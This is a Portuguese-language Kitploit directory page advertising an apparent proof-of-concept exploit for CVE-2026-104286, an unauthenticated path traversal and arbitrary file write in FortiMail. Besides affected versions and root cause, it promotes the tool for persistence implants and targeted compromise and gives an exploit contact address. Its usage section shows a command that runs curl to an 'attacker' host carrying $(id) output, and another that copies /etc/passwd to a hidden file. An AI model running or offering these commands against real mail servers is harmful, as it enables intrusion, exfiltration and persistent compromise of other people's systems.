Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-104286-POC — Exploração de path traversal não autenticada para CVE-2026-104286 no FortiMail, gravando arquivos arbitrários por meio de requisições HTTP/HTTPS manipuladas para avaliação de red team e persistência. | Kitploit
Ferramentas/GitHubGitHub/shadowforge-cyber/cve-2026-104286-poc
Mecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança WebTestes de PenetraçãoRed TeamingDesenvolvimento de Payloads

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
GitHubshadowforge-cyber/cve-2026-104286-poc

CVE-2026-104286-POC

Exploração de path traversal não autenticada para CVE-2026-104286 no FortiMail, gravando arquivos arbitrários por meio de requisições HTTP/HTTPS manipuladas para avaliação de red team e persistência.

Ver Repositório
há 1 diaAinda não revisado
Compartilhar

Exploit de Path Traversal no FortiMail CVE-2026-104286

Visão Geral

Exploit avançado de escrita arbitrária de arquivos remota e não autenticada para CVE-2026-104286 no FortiMail. Requisições HTTP/HTTPS elaboradas contornam a sanitização de caminhos no cliente web, permitindo a criação arbitrária de arquivos no sistema operacional subjacente. Utilizado para avaliação de red team, implantes de persistência e comprometimento direcionado de implantações do FortiMail.

Versões Afetadas

FortiMail 8.0.x (<8.0.2), 7.6.x (<7.6.6), 7.4.x (<7.4.8), 7.2.x (<7.2.9), 7.0.x (<7.0.10)

Causa Raiz

Limitação inadequada de um nome de caminho a um diretório restrito (CWE-22). Ausência de validação de sequências ../ em caminhos de upload de arquivos dentro dos manipuladores da API HTTP/HTTPS, permitindo travessia para fora do diretório de upload pretendido.

Uso

$ python3 cve-2026-104286.py -u http://target:443 -c "curl -s http://attacker:80/$(id)"
$ python3 cve-2026-104286.py -u http://target:443 -l /etc/passwd -o /var/tmp/.hacked
image

Exploit

Contato para exploit: [email protected]

Baixar ferramenta